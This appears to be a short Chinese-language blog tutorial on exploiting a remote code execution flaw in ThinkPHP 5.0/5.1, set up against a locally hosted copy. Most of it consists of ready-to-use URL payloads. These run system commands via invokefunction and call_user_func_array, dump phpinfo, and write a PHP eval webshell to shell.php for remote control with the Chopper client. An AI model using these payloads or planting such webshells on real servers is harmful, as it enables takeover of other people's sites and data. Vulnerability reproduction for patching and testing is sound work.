溫馨提示×
您好,登錄后才能下訂單哦!
點擊 登錄注冊 即表示同意《億速云用戶服務條款》
您好,登錄后才能下訂單哦!
本篇文章給大家分享的是有關如何實現ThinkPHP5.0遠程代碼執行,小編覺得挺實用的,因此分享給大家學習,希望大家閱讀完這篇文章后可以有所收獲,話不多說,跟著小編一起來看看吧。
ThinkPHP是一款國內流行的開源PHP框架,某些版本可能存在遠程代碼執行漏洞,攻擊者可向緩存文件內寫入PHP代碼,導致遠程代碼執行。雖然該漏洞利用需要有幾個前提條件,但鑒于國內使用ThinkPHP框架的站點數量之多,該漏洞還是存在一定的影響范圍.
受影響的版本包括5.0和5.1
下載ThinkPHP5.0.22版本源碼程序,放在PHPStudy運行目錄下并訪問
1.將Payload添加進入URL地址后面進行利用
Payload1:system函數遠程命令執行
?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami
Payload2:phpinfo函數查看phpinfo()的信息
?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1
2.利用Payload寫入shell,并使用菜刀進行連接
Payload1:寫入shell
?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo ^<?php @eval($_POST[cmd]);?^> >shell.php
**注意:**需要對特殊字符使用^轉義(cmd環境下轉義方式),windows環境的echo命令輸出字符串到文檔不用引號(單引號、雙引號),部分字符url編碼不編碼都行.
菜刀連接
以上就是如何實現ThinkPHP5.0遠程代碼執行,小編相信有部分知識點可能是我們日常工作會見到或用到的。希望你能通過這篇文章學到更多知識。更多詳情敬請關注億速云行業資訊頻道。
免責聲明:本站發布的內容(圖片、視頻和文字)以原創、轉載和分享為主,文章觀點不代表本網站立場,如果涉及侵權請聯系站長郵箱:is@yisu.com進行舉報,并提供相關證據,一經查實,將立刻刪除涉嫌侵權內容。
